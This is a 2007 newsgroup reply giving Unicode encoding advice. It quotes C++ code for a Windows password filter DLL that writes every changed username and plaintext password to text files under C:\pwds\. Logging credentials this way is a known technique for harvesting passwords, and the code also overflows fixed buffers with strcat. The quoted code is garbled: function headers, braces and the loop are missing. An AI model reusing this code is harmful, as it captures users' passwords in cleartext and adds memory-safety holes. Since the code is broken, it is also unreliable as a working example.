Re: Get ASCII value for character when higher than 127

"Ben Voigt" <rbv@nospam.nospam>
Thu, 24 May 2007 10:14:59 -0500
Instead of wcstombs, use WideCharToMultiByte and CP_UTF8

Also write the UTF byte order mark to the beginning of the file, so it will
be decoded correctly by other programs (eg Notepad)

<> wrote in message

For work, I need to write a password filter. The problem is that my C+
+ experience is only some practice in school, 10 years ago. I now
develop in C# which is completely different to me.

But, the password filter needs to be built, so I'm doing my best.
First of all, I am creating an xml string that contains both username
and password, and then I want to write the ascii values for all
characters to a textfile. By using the ascii values I am sure I can
store special characters, also in a textfile.

I got it working, but only when the password only contains characters
that have an ASCII value lower than 127. But, in windows it is
possible to change a password also to something that contains special
characters, like ?, ?, or ?.so I also need to be able to get these
characters in my filter.

Below is the code that works for characters with ASCII values lower
than 127. Can anyone tell me what I need to do to get this working for
all characters?

I've been searching and puzzling for two days now and haven't gotten
any closer to how to solve this.

Any help will be appreciated.

Thanks in advance,


#include <windows.h>
#include <ntsecapi.h>
#include <time.h>
#include <fstream>
#include <iostream>
#include "PwdHookNew.h"
#include <sstream>
#include <string>

using namespace std;

        #define STATUS_SUCCESS ((NTSTATUS)0x00000000L)

string GetASCIIString(string oristring)
        unsigned char ch;

        int i, j, k;
        string numstrings;

        ostringstream oss;

                k = int(ch);

                if (k<10)
                        oss << "000" << k << "-";
                else if (k<100)
                        oss << "00" << k << "-";
                else if(k<1000)
                        oss << "0" << k << "-";
                        oss << k << "-";

        return numstrings;

        PUNICODE_STRING UserName,
        ULONG RelativeId,
        PUNICODE_STRING Password
        const char* timeStringFormat = "%Y-%m-%d_%H-%M-%S";
        const int timeStringLength = 20;
        char timeString[timeStringLength];

        // get current date and time
        time_t t = time(0);
        tm *curTime = localtime(&t);

        strftime(timeString, timeStringLength, timeStringFormat,

        char path[80];
        strcpy (path,"C:\\pwds\\");
        strcat (path,timeString);
        strcat (path,".txt");

        char *usernameStr, *passwordStr;

        usernameStr = (char*)calloc(1, (UserName->Length/2)+1);
        passwordStr = (char*)calloc(1, (Password->Length/2)+1);

        wcstombs(usernameStr, UserName->Buffer, (UserName->Length/2));
        wcstombs(passwordStr, Password->Buffer, (Password->Length/2));

        char xmlmsg[150];
        strcpy (xmlmsg,"<userpwd><username>");
        strcat (xmlmsg,usernameStr);
        strcat (xmlmsg,"</username><password>");
        strcat (xmlmsg,passwordStr);
        strcat (xmlmsg,"</password></userpwd>");

        string xmlASCII = GetASCIIString(xmlmsg);

        ofstream outPwd(path, ios::app);

        if (!outPwd)
                ofstream outPwd(path, ios::out );

        outPwd << xmlASCII ;

        return STATUS_SUCCESS;

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